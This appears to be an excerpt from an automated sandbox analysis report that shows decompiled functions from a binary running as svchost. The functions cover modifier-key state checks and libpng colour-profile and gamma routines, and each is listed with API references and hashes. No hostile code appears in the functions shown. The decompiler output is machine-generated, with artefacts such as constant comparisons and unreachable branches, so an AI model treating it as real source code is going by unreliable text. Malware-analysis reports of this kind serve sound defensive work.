    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Time$InformationLocalSystemZone
    • String ID:
    • API String ID: 2475273158-0
    • Opcode ID: ad26100524ea4ac7edeba87e8f98a9ff572eb253ceb25f3d3139af7711924d4a
    • Instruction ID: f2ed3fb4cf9e4f16fd8251fbfce2a44957ed7a6e711e2ae4757eda4351158606
    • Opcode Fuzzy Hash: ad26100524ea4ac7edeba87e8f98a9ff572eb253ceb25f3d3139af7711924d4a
    • Instruction Fuzzy Hash: 39215329800119ADCB21AF95D9446FF73B9EB19B50F404117FD55E62A0D3B84CC6C76C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041F080(intOrPtr _a4) {
    				signed int _t11;
    
    				_t11 =  *(_a4 + 8) & 0x000000ff;
    				if(_t11 < 0x60 || _t11 > 0x69) {
    					if(_t11 != 0x6d) {
    						if(_t11 != 0x6e) {
    							if(_t11 != 0x6f) {
    								goto L3;
    							}
    							_t11 = 0xbf;
    							goto L4;
    						}
    						_t11 = 0xbe;
    						goto L4;
    					}
    					_t11 = 0xbd;
    					goto L4;
    				} else {
    					_t11 = _t11 + 0xffd0;
    					L3:
    					if(_t11 == 0x11) {
    						L6:
    						if(_t11 != 0x10 && GetKeyState(0x10) < 0) {
    							_t11 = _t11 | 0x00004000;
    						}
    						if(_t11 != 0x12 && GetKeyState(0x12) < 0) {
    							_t11 = _t11 | 0x00008000;
    						}
    						return _t11;
    					}
    					L4:
    					if(GetKeyState(0x11) < 0) {
    						_t11 = _t11 | 0x00002000;
    					}
    					goto L6;
    				}
    			}

    APIs
    • GetKeyState.USER32(00000011), ref: 0041F0B1
    • GetKeyState.USER32(00000010), ref: 0041F0C6
    • GetKeyState.USER32(00000012), ref: 0041F0DB
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: State
    • String ID:
    • API String ID: 1649606143-0
    • Opcode ID: 70863139ccc34d4c811373eecc736c55601ca5eb3a0a1843d03fde3624c567c5
    • Instruction ID: 6c69a81168a4cfbcabce5ed21a98cb28dea9316d92e4d113119c82242428f6b5
    • Opcode Fuzzy Hash: 70863139ccc34d4c811373eecc736c55601ca5eb3a0a1843d03fde3624c567c5
    • Instruction Fuzzy Hash: 0301AD3FD0466A46EB2422649908BF65D810B58B54F6A8077C94D37283858C0CCF27AF
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0048837D(intOrPtr _a4) {
    				intOrPtr _t6;
    				void* _t13;
    
    				_t6 = _a4;
    				if( *((intOrPtr*)(_t6 + 4)) != 0x100 ||  *((intOrPtr*)(_t6 + 8)) != 0x70 || ( *(_t6 + 0xc) >> 0x00000010 & 0x00000040) != 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
    					return 0;
    				} else {
    					_t13 = 1;
    					return _t13;
    				}
    			}

    APIs
    • GetKeyState.USER32(00000010), ref: 004883A4
    • GetKeyState.USER32(00000011), ref: 004883AD
    • GetKeyState.USER32(00000012), ref: 004883B6
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: State
    • String ID:
    • API String ID: 1649606143-0
    • Opcode ID: 132e2153a714cf300b26e85cb71834d269290b094b34fbcccaf30a9ffab9a0d0
    • Instruction ID: c772513ff8791ed6301aaa190c15da40e7a5fa6c4147ecc743e7c35a14e57963
    • Opcode Fuzzy Hash: 132e2153a714cf300b26e85cb71834d269290b094b34fbcccaf30a9ffab9a0d0
    • Instruction Fuzzy Hash: 90E09B357012599DEB40F2408900FDD76916F30F90FC4EC6FEE84BB191CEA98C529769
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 43%
    			E00440F70() {
    				intOrPtr _t89;
    				void* _t90;
    				intOrPtr _t91;
    				intOrPtr* _t98;
    				signed int _t153;
    				intOrPtr _t160;
    				signed int _t162;
    				void* _t163;
    				void* _t170;
    
    				_t160 =  *((intOrPtr*)(_t170 + 0x1c));
    				_t153 = 0;
    				_t163 = 0x10000;
    				 *((intOrPtr*)(_t170 + 0x10)) = 0;
    				 *(_t170 + 0x14) = 0;
    				_t98 = 0x497b78;
    				do {
    					_t8 = _t98 - 4; // 0x29f83dde
    					if(0xbadbad !=  *_t8 || 0xbadbad !=  *_t98) {
    						goto L17;
    					} else {
    						_t17 = _t98 + 4; // 0x7842fae4
    						if(0xbadbad !=  *_t17) {
    							goto L17;
    						} else {
    							_t22 = _t98 + 8; // 0xca83390d
    							if(0xbadbad !=  *_t22) {
    								goto L17;
    							} else {
    								if(_t153 == 0) {
    									_t153 = 0xbadbad;
    									_t163 = 0xbadbad;
    								}
    								_t30 = _t98 - 8; // 0xbe8
    								if(_t153 !=  *_t30 || _t163 != 0) {
    									L15:
    									_t40 = _t98 + 0xc; // 0x1
    									if( *_t40 != 0) {
    										E00449710( *((intOrPtr*)(_t170 + 0x1c)), "copyright violation: edited ICC profile ignored");
    										_t170 = _t170 + 8;
    									}
    									goto L17;
    								} else {
    									if( *((intOrPtr*)(_t170 + 0x24)) == 0) {
    										_push(0);
    										_push(0);
    										_push(0);
    										_t90 = E00465040();
    										_push(_t153);
    										_push(_t160);
    										_push(_t90);
    										_t91 = E00465040();
    										_t170 = _t170 + 0x18;
    										 *((intOrPtr*)(_t170 + 0x24)) = _t91;
    									}
    									_t35 = _t98 - 0x10; // 0xa3fd9f6
    									if( *((intOrPtr*)(_t170 + 0x24)) !=  *_t35) {
    										goto L15;
    									} else {
    										if( *((intOrPtr*)(_t170 + 0x10)) == 0) {
    											_t89 = E00449F00(E00449F00(0, 0, 0), _t160, _t153);
    											_t170 = _t170 + 0x18;
    											 *((intOrPtr*)(_t170 + 0x10)) = _t89;
    										}
    										_t39 = _t98 - 0xc; // 0x3b8772b9
    										if( *((intOrPtr*)(_t170 + 0x10)) ==  *_t39) {
    											_t162 =  *(_t170 + 0x14) << 5;
    											if( *((intOrPtr*)(_t162 + 0x497b85)) == 0) {
    												if( *((intOrPtr*)(_t162 + 0x497b84)) == 0) {
    													_push(0);
    													_push("out-of-date sRGB profile with no signature");
    													_push( *((intOrPtr*)(_t170 + 0x1c)));
    													goto L23;
    												}
    											} else {
    												_push(2);
    												_push("known incorrect sRGB profile");
    												_push( *((intOrPtr*)(_t170 + 0x1c)));
    												L23:
    												E00449970();
    											}
    											return 1;
    										} else {
    											goto L15;
    										}
    									}
    								}
    							}
    						}
    					}
    					L25:
    					L17:
    					_t98 = _t98 + 0x20;
    					 *(_t170 + 0x14) =  *(_t170 + 0x14) + 1;
    				} while (_t98 < 0x497c58);
    				return 0;
    				goto L25;
    			}

    Strings
    • out-of-date sRGB profile with no signature, xrefs: 00441166
    • copyright violation: edited ICC profile ignored, xrefs: 00441107
    • known incorrect sRGB profile, xrefs: 0044114E
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID: copyright violation: edited ICC profile ignored$known incorrect sRGB profile$out-of-date sRGB profile with no signature
    • API String ID: 0-1307623137
    • Opcode ID: e54c6f50ef10afe629bd2b2fbc276af7dff5a9f5fb71393feda3a81690ea2d4c
    • Instruction ID: 832bd9d3fd13058db5d6e847f2b99050423461b42284168bca8ed6be1759e45b
    • Opcode Fuzzy Hash: e54c6f50ef10afe629bd2b2fbc276af7dff5a9f5fb71393feda3a81690ea2d4c
    • Instruction Fuzzy Hash: 595128B270C7910BEB28CE394C5176BBBE25FC9305F09886DE5D6C7702E568E909C768
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 74%
    			E0044EED0(void* __fp0) {
    				signed int _t332;
    				signed int _t333;
    				signed char _t334;
    				signed int _t335;
    				void* _t337;
    				signed char _t338;
    				intOrPtr* _t341;
    				signed int _t343;
    				signed char _t344;
    				intOrPtr _t345;
    				intOrPtr _t346;
    				intOrPtr _t347;
    				intOrPtr _t348;
    				signed char _t350;
    				signed int _t351;
    				signed int _t356;
    				signed int _t358;
    				short _t370;
    				short _t371;
    				signed int _t372;
    				short _t375;
    				signed int _t378;
    				signed int _t379;
    				signed int _t382;
    				signed int _t383;
    				signed int _t391;
    				signed int _t393;
    				signed char _t394;
    				char _t439;
    				char _t443;
    				char _t444;
    				signed int _t448;
    				signed int _t452;
    				intOrPtr _t457;
    				signed char* _t459;
    				void* _t460;
    				void* _t461;
    				void* _t463;
    				void* _t464;
    				void* _t466;
    				void* _t467;
    				signed int _t485;
    				signed int _t494;
    				signed int _t495;
    				signed int _t496;
    				void* _t502;
    				signed int _t503;
    				signed int _t504;
    				signed int _t526;
    				signed int _t529;
    				signed int _t540;
    				signed int _t543;
    				signed int _t550;
    				signed char _t563;
    				signed int _t564;
    				signed int _t568;
    				signed int _t572;
    				signed int _t579;
    				signed int _t582;
    				intOrPtr* _t584;
    				void* _t590;
    				void* _t591;
    				signed int _t618;
    				intOrPtr* _t646;
    				signed char _t648;
    				signed int _t655;
    				intOrPtr _t658;
    				void* _t659;
    				signed int _t663;
    				signed int _t664;
    				signed int _t665;
    				void* _t668;
    				intOrPtr _t685;
    				intOrPtr _t688;
    				signed int _t689;
    				intOrPtr _t702;
    				intOrPtr _t704;
    				void* _t714;
    				void* _t715;
    				void* _t716;
    				void* _t717;
    				void* _t718;
    				void* _t720;
    
    				_t778 = __fp0;
    				_t685 =  *((intOrPtr*)(_t714 + 0x1c));
    				_t655 = 0;
    				_t332 =  *(_t685 + 0x2dc);
    				if(_t332 == 0) {
    					_t333 =  *(_t685 + 0x18c);
    					__eflags = _t333;
    					if(__eflags == 0) {
    						 *(_t685 + 0x2dc) = 0x186a0;
    						 *(_t685 + 0x18c) = 0x186a0;
    					} else {
    						_push(_t333);
    						_t494 = E004417B0(__eflags, __fp0);
    						_t714 = _t714 + 4;
    						 *(_t685 + 0x2dc) = _t494;
    					}
    				} else {
    					_t582 =  *(_t685 + 0x18c);
    					_t722 = _t582;
    					if(_t582 == 0) {
    						_push(_t332);
    						_t495 = E004417B0(__eflags, __fp0);
    						_t714 = _t714 + 4;
    						 *(_t685 + 0x18c) = _t495;
    					} else {
    						_t496 = E0044F9F0(_t722, __fp0, _t332, _t582);
    						_t714 = _t714 + 8;
    						_t655 = _t496;
    					}
    				}
    				 *(_t685 + 0x326) =  *(_t685 + 0x326) | 0x00000001;
    				_t334 =  *(_t685 + 0x7c);
    				if(_t655 == 0) {
    					_t335 = _t334 & 0xffffdfff;
    					__eflags = _t335;
    				} else {
    					_t335 = _t334 | 0x00000020;
    				}
    				 *(_t685 + 0x7c) = _t335;
    				if((_t335 & 0x00040000) != 0 && (0x00000080 & _t335) == 0) {
    					 *((short*)(_t685 + 0x150)) = 0;
    					 *(_t685 + 0x7c) = _t335 & 0xfd7ffeff;
    					 *(_t685 + 0x78) =  *(_t685 + 0x78) & 0xffffdfff;
    				}
    				_t337 = E00441800( *(_t685 + 0x18c));
    				_t715 = _t714 + 4;
    				if(_t337 == 0) {
    					 *(_t685 + 0x7c) =  *(_t685 + 0x7c) & 0xff7fffff;
    					 *(_t685 + 0x78) =  *(_t685 + 0x78) & 0xffffdfff;
    				}
    				if(( *(_t685 + 0x7c) & 0x00600000) != 0) {
    					E00441190(_t778, _t685);
    					_t715 = _t715 + 4;
    				}
    				_t338 =  *(_t685 + 0x7c);
    				if((_t338 & 0x00000001) == 0) {
    					__eflags = 0x00000080 & _t338;
    					if((0x00000080 & _t338) != 0) {
    						__eflags = _t338 & 0x00000040;
    						if((_t338 & 0x00000040) != 0) {
    							_t485 =  *(_t685 + 0x16a);
    							__eflags = _t485 -  *(_t685 + 0x16c);
    							if(_t485 ==  *(_t685 + 0x16c)) {
    								__eflags = _t485 -  *(_t685 + 0x16e);
    								if(_t485 ==  *(_t685 + 0x16e)) {
    									 *(_t685 + 0x170) = _t485;
    									_t579 =  *(_t685 + 0x74) | 0x00000008;
    									__eflags = _t579;
    									 *(_t685 + 0x74) = _t579;
    								}
    							}
    						}
    					}
    				} else {
    					if(( *(_t685 + 0x157) & 0x00000002) == 0) {
    						 *(_t685 + 0x74) =  *(_t685 + 0x74) | 0x00000008;
    					}
    				}
    				_push(_t685);
    				if( *(_t685 + 0x157) != 3) {
    					E0044FB20();
    				} else {
    					E0044FA30();
    				}
    				_t529 =  *(_t685 + 0x7c);
    				_t716 = _t715 + 4;
    				if((_t529 & 0x00000002) != 0 && (0x00000080 & _t529) != 0 && (_t529 & 0x00000001) == 0 &&  *((intOrPtr*)(_t685 + 0x158)) != 0x10) {
    					 *(_t685 + 0x16a) = 0xbadb2c >> 0x10;
    					 *(_t685 + 0x16c) = 0xbadb2c >> 0x10;
    					 *(_t685 + 0x16e) = 0xbadb2c >> 0x10;
    					 *(_t685 + 0x170) = 0xbadb2c >> 0x10;
    				}
    				if((_t529 & 0x04000400) != 0 && (0x00000080 & _t529) != 0 && (_t529 & 0x00000001) == 0 &&  *((intOrPtr*)(_t685 + 0x158)) == 0x10) {
    					 *(_t685 + 0x16a) =  *(_t685 + 0x16a) * 0x101;
    					 *(_t685 + 0x16c) =  *(_t685 + 0x16c) * 0x101;
    					 *(_t685 + 0x16e) =  *(_t685 + 0x16e) * 0x101;
    					 *(_t685 + 0x170) =  *(_t685 + 0x170) * 0x101;
    				}
    				_t584 = _t685 + 0x168;
    				_t341 = _t685 + 0x172;
    				 *_t341 =  *_t584;
    				 *((intOrPtr*)(_t341 + 4)) =  *((intOrPtr*)(_t584 + 4));
    				 *((short*)(_t341 + 8)) =  *((intOrPtr*)(_t584 + 8));
    				if((_t529 & 0x00000020) != 0) {
    					L59:
    					E00441AC0(_t778, _t685, 0);
    					_t343 =  *(_t685 + 0x7c);
    					_t717 = _t716 + 8;
    					__eflags = 0x00000080 & _t343;
    					if((0x00000080 & _t343) == 0) {
    						__eflags =  *(_t685 + 0x157) - 3;
    						if( *(_t685 + 0x157) != 3) {
    							goto L118;
    						}
    						__eflags = _t343 & 0x00000010;
    						if((_t343 & 0x00000010) == 0) {
    							L113:
    							_t348 =  *((intOrPtr*)(_t685 + 0x144));
    							_t540 =  *((intOrPtr*)(_t685 + 0x148));
    							__eflags = 0;
    							if(0 <= 0) {
    								L116:
    								_t350 =  *(_t685 + 0x7c) & 0xffffdfff;
    								__eflags = _t350;
    								goto L117;
    							}
    							_t351 = _t348 + 2;
    							__eflags = _t351;
    							do {
    								_t351 = _t351 + 3;
    								 *((char*)(_t351 - 5)) =  *((intOrPtr*)(0 +  *((intOrPtr*)(_t685 + 0x190))));
    								 *((char*)(_t351 - 4)) =  *((intOrPtr*)(0 +  *((intOrPtr*)(_t685 + 0x190))));
    								_t540 = _t540 - 1;
    								__eflags = _t540;
    								 *((char*)(_t351 - 3)) =  *((intOrPtr*)(0 +  *((intOrPtr*)(_t685 + 0x190))));
    							} while (_t540 != 0);
    							goto L116;
    						}
    						__eflags = _t343 & 0x00600000;
    						if((_t343 & 0x00600000) != 0) {
    							goto L118;
    						}
    						goto L113;
    					}
    					__eflags = _t343 & 0x00600000;
    					if((_t343 & 0x00600000) != 0) {
    						E004496C0(_t685, "libpng does not support gamma+background+rgb_to_gray");
    						_t717 = _t717 + 8;
    					}
    					__eflags =  *(_t685 + 0x157) - 3;
    					if( *(_t685 + 0x157) != 3) {
    						_t663 = 0x186a0;
    						_t689 = 0x186a0;
    						__eflags = 0xffffffffffffffff;
    						if(0xffffffffffffffff == 0) {
    							_t663 =  *(_t685 + 0x18c);
    						} else {
    							__eflags = 0xffffffffffffffff;
    							if(0xffffffffffffffff == 0) {
    								_push( *(_t685 + 0x2dc));
    								_t378 = E004417B0(0xffffffffffffffff, _t778);
    								_push( *(_t685 + 0x18c));
    								_push( *(_t685 + 0x2dc));
    								_t663 = _t378;
    								_t379 = E00441820(_t378, __eflags, _t778);
    								_t717 = _t717 + 0xc;
    								_t689 = _t379;
    							} else {
    								__eflags = 0xfffffffffffffffd;
    								if(0xfffffffffffffffd == 0) {
    									_push( *((intOrPtr*)(_t685 + 0x164)));
    									_t382 = E004417B0(0xfffffffffffffffd, _t778);
    									_push( *(_t685 + 0x18c));
    									_push( *((intOrPtr*)(_t685 + 0x164)));
    									_t663 = _t382;
    									_t383 = E00441820(_t382, __eflags, _t778);
    									_t717 = _t717 + 0xc;
    									_t689 = _t383;
    								} else {
    									E00449530(_t685, "invalid background gamma type");
    									_t717 = _t717 + 8;
    								}
    							}
    						}
    						_t503 = E00441800(_t663);
    						_t356 = E00441800(_t689);
    						_t718 = _t717 + 8;
    						 *(_t718 + 0x20) = _t356;
    						__eflags = _t503;
    						if(_t503 != 0) {
    							__eflags = 0;
    							_t375 = E00441930(_t685, 0, _t663);
    							_t718 = _t718 + 0xc;
    							 *((short*)(_t685 + 0x17a)) = _t375;
    						}
    						__eflags =  *(_t718 + 0x20);
    						if( *(_t718 + 0x20) != 0) {
    							__eflags = 0;
    							_t372 = E00441930(_t685, 0, _t689);
    							_t718 = _t718 + 0xc;
    							 *(_t685 + 0x170) = _t372;
    						}
    						_t358 =  *(_t685 + 0x16a);
    						__eflags = _t358 -  *(_t685 + 0x16c);
    						if(_t358 !=  *(_t685 + 0x16c)) {
    							L105:
    							__eflags = _t503;
    							if(_t503 != 0) {
    								 *((short*)(_t685 + 0x174)) = E00441930(_t685, _t358 & 0x0000ffff, _t663);
    								 *((short*)(_t685 + 0x176)) = E00441930(_t685, 0, _t663);
    								__eflags = 0;
    								_t370 = E00441930(_t685, 0, _t663);
    								_t718 = _t718 + 0x24;
    								 *((short*)(_t685 + 0x178)) = _t370;
    							}
    							__eflags =  *(_t718 + 0x20);
    							if( *(_t718 + 0x20) != 0) {
    								 *(_t685 + 0x16a) = E00441930(_t685, 0, _t689);
    								 *(_t685 + 0x16c) = E00441930(_t685, 0, _t689);
    								__eflags = 0;
    								 *(_t685 + 0x16e) = E00441930(_t685, 0, _t689);
    							}
    							 *((char*)(_t685 + 0x162)) = 1;
    						} else {
    							__eflags = _t358 -  *(_t685 + 0x16e);
    							if(_t358 !=  *(_t685 + 0x16e)) {
    								goto L105;
    							}
    							_t543 =  *(_t685 + 0x170);
    							__eflags = _t358 - _t543;
    							if(_t358 != _t543) {
    								goto L105;
    							}
    							_t371 =  *((intOrPtr*)(_t685 + 0x17a));
    							 *(_t685 + 0x16e) = _t543;
    							 *((short*)(_t685 + 0x178)) = _t371;
    							 *((short*)(_t685 + 0x176)) = _t371;
    							 *((short*)(_t685 + 0x174)) = _t371;
    							 *(_t685 + 0x16c) = _t543;
    							 *(_t685 + 0x16a) = _t543;
    							 *((char*)(_t685 + 0x162)) = 1;
    						}
    						goto L118;
    					} else {
    						 *((intOrPtr*)(_t717 + 0x18)) =  *((intOrPtr*)(_t685 + 0x144));
    						 *(_t717 + 0x14) = 0;
    						__eflags =  *((intOrPtr*)(_t685 + 0x162)) - 2;
    						if( *((intOrPtr*)(_t685 + 0x162)) != 2) {
    							__eflags = 0;
    							if(0 == 0) {
    								_t664 =  *(_t685 + 0x18c);
    								L72:
    								_t504 = 0x186a0;
    								L73:
    								_t391 = E00441800(_t504);
    								_t720 = _t717 + 4;
    								__eflags = _t391;
    								if(_t391 == 0) {
    									 *((char*)(_t720 + 0x20)) =  *(_t685 + 0x16a);
    									 *((char*)(_t720 + 0x21)) =  *(_t685 + 0x16c);
    									 *((char*)(_t720 + 0x22)) =  *(_t685 + 0x16e);
    								} else {
    									_push(_t504);
    									 *((char*)(_t720 + 0x28)) = E00441870( *(_t685 + 0x16a), _t778, 0);
    									_push(_t504);
    									_t443 = E00441870( *(_t685 + 0x16a), _t778, 0);
    									_push(_t504);
    									 *((char*)(_t720 + 0x35)) = _t443;
    									_t444 = E00441870( *(_t685 + 0x16a), _t778, 0);
    									_t720 = _t720 + 0x18;
    									 *((char*)(_t720 + 0x22)) = _t444;
    								}
    								_t393 = E00441800(_t664);
    								_t717 = _t720 + 4;
    								__eflags = _t393;
    								if(_t393 == 0) {
    									_t394 =  *(_t685 + 0x16e);
    									 *(_t717 + 0x11) =  *(_t685 + 0x16c);
    								} else {
    									_push(_t664);
    									E00441870( *(_t685 + 0x16a), _t778, 0);
    									_push(_t664);
    									_t439 = E00441870( *(_t685 + 0x16a), _t778, 0);
    									_push(_t664);
    									 *((char*)(_t717 + 0x25)) = _t439;
    									_t394 = E00441870( *(_t685 + 0x16a), _t778, 0);
    									_t717 = _t717 + 0x18;
    								}
    								 *(_t717 + 0x12) = _t394;
    								L80:
    								_t665 = 0;
    								__eflags =  *(_t717 + 0x14);
    								if( *(_t717 + 0x14) <= 0) {
    									L89:
    									_t350 =  *(_t685 + 0x7c) & 0xffffdf7f;
    									goto L117;
    								}
    								_t550 =  *((intOrPtr*)(_t717 + 0x18)) + 2;
    								__eflags = _t550;
    								do {
    									__eflags = _t665;
    									if(_t665 >= 0) {
    										L87:
    										 *((char*)(_t550 - 2)) =  *((intOrPtr*)(0 +  *((intOrPtr*)(_t685 + 0x190))));
    										__eflags = 0;
    										 *((char*)(_t550 - 1)) =  *((intOrPtr*)(0 +  *((intOrPtr*)(_t685 + 0x190))));
    										 *_t550 =  *((intOrPtr*)(0 +  *((intOrPtr*)(_t685 + 0x190))));
    										goto L88;
    									}
    									_t618 =  *( *((intOrPtr*)(_t685 + 0x1b4)) + _t665);
    									__eflags = _t618 - 0xff;
    									if(_t618 == 0xff) {
    										goto L87;
    									}
    									__eflags = _t618;
    									if(_t618 != 0) {
    										 *((char*)(_t550 - 2)) =  *((intOrPtr*)(0xad +  *((intOrPtr*)(_t685 + 0x198))));
    										 *((char*)(_t550 - 1)) =  *((intOrPtr*)((((0 * ( *( *((intOrPtr*)(_t685 + 0x1b4)) + _t665) & 0x000000ff) + (0x000000ff - ( *( *((intOrPtr*)(_t685 + 0x1b4)) + _t665) & 0x000000ff)) * ( *(_t717 + 0x11) & 0x000000ff) + 0x00000080 & 0x0000ffff) >> 0x00000008) + (0 * ( *( *((intOrPtr*)(_t685 + 0x1b4)) + _t665) & 0x000000ff) + (0x000000ff - ( *( *((intOrPtr*)(_t685 + 0x1b4)) + _t665) & 0x000000ff)) * ( *(_t717 + 0x11) & 0x000000ff) + 0x00000080 & 0x0000ffff) >> 0x00000008 & 0x000000ff) +  *((intOrPtr*)(_t685 + 0x198))));
    										 *_t550 =  *((intOrPtr*)((((0 * ( *( *((intOrPtr*)(_t685 + 0x1b4)) + _t665) & 0x000000ff) + (0x000000ff - ( *( *((intOrPtr*)(_t685 + 0x1b4)) + _t665) & 0x000000ff)) * ( *(_t717 + 0x12) & 0x000000ff) + 0x00000080 & 0x0000ffff) >> 0x00000008) + (0 * ( *( *((intOrPtr*)(_t685 + 0x1b4)) + _t665) & 0x000000ff) + (0x000000ff - ( *( *((intOrPtr*)(_t685 + 0x1b4)) + _t665) & 0x000000ff)) * ( *(_t717 + 0x12) & 0x000000ff) + 0x00000080 & 0x0000ffff) >> 0x00000008 & 0x000000ff) +  *((intOrPtr*)(_t685 + 0x198))));
    									} else {
    										 *((short*)(_t550 - 2)) =  *((intOrPtr*)(_t717 + 0x20));
    										 *((char*)(_t550 - 2 + 2)) =  *((intOrPtr*)(_t717 + 0x22));
    									}
    									L88:
    									_t665 = _t665 + 1;
    									_t550 = _t550 + 3;
    									__eflags = _t665 -  *(_t717 + 0x14);
    								} while (_t665 <  *(_t717 + 0x14));
    								goto L89;
    							}
    							__eflags = 0;
    							if(0 == 0) {
    								_push( *(_t685 + 0x2dc));
    								_t664 = E004417B0(0, _t778);
    								_push( *(_t685 + 0x18c));
    								_push( *(_t685 + 0x2dc));
    								_t448 = E00441820( *(_t685 + 0x18c), __eflags, _t778);
    								_t717 = _t717 + 0xc;
    								_t504 = _t448;
    								goto L73;
    							}
    							__eflags = 0xfffffffffffffffd;
    							if(0xfffffffffffffffd == 0) {
    								_push( *((intOrPtr*)(_t685 + 0x164)));
    								_t664 = E004417B0(0xfffffffffffffffd, _t778);
    								_push( *(_t685 + 0x18c));
    								_push( *((intOrPtr*)(_t685 + 0x164)));
    								_t452 = E00441820( *(_t685 + 0x18c), __eflags, _t778);
    								_t717 = _t717 + 0xc;
    								_t504 = _t452;
    								goto L73;
    							}
    							_t664 = 0x186a0;
    							goto L72;
    						}
    						_t702 =  *((intOrPtr*)(_t685 + 0x190));
    						 *((char*)(_t717 + 0x20)) =  *((intOrPtr*)(0 + _t702));
    						 *((char*)(_t717 + 0x21)) =  *((intOrPtr*)(0 + _t702));
    						 *((char*)(_t717 + 0x22)) =  *((intOrPtr*)(0 + _t702));
    						_t646 =  *((intOrPtr*)(_t685 + 0x19c));
    						 *(_t717 + 0x11) =  *_t646;
    						 *(_t717 + 0x12) =  *_t646;
    						goto L80;
    					}
    				} else {
    					if((_t529 & 0x00600000) == 0) {
    						L42:
    						if(( *(_t685 + 0x7c) & 0x00000080) == 0) {
    							L47:
    							if(( *(_t685 + 0x7c) & 0x00800000) == 0) {
    								L49:
    								if(( *(_t685 + 0x7c) & 0x00000080) == 0 ||  *(_t685 + 0x157) != 3) {
    									L118:
    									_t344 =  *(_t685 + 0x7c);
    									if((_t344 & 0x00000008) == 0 || (_t344 & 0x00000010) != 0 ||  *(_t685 + 0x157) != 3) {
    										L136:
    										return _t344;
    									} else {
    										_t688 =  *((intOrPtr*)(_t685 + 0x148));
    										_t344 = _t344 & 0x000000f7;
    										 *(_t685 + 0x7c) = _t344;
    										if(8 <= 0 || 8 >= 8 || 0 <= 0) {
    											L126:
    											if(8 <= 0 || 8 >= 8 || _t688 <= 0) {
    												L131:
    												if(8 > 0 && 8 < 8 && _t688 > 0) {
    													_t590 = 0;
    													do {
    														_t345 =  *((intOrPtr*)(_t685 + 0x144));
    														 *(_t590 + _t345 + 2) =  *(_t590 + _t345 + 2) >> 8;
    														_t331 = _t345 + 2; // 0x2
    														_t344 = _t590 + _t331;
    														_t590 = _t590 + 3;
    														_t688 = _t688 - 1;
    													} while (_t688 != 0);
    												}
    												goto L136;
    											} else {
    												_t591 = 0;
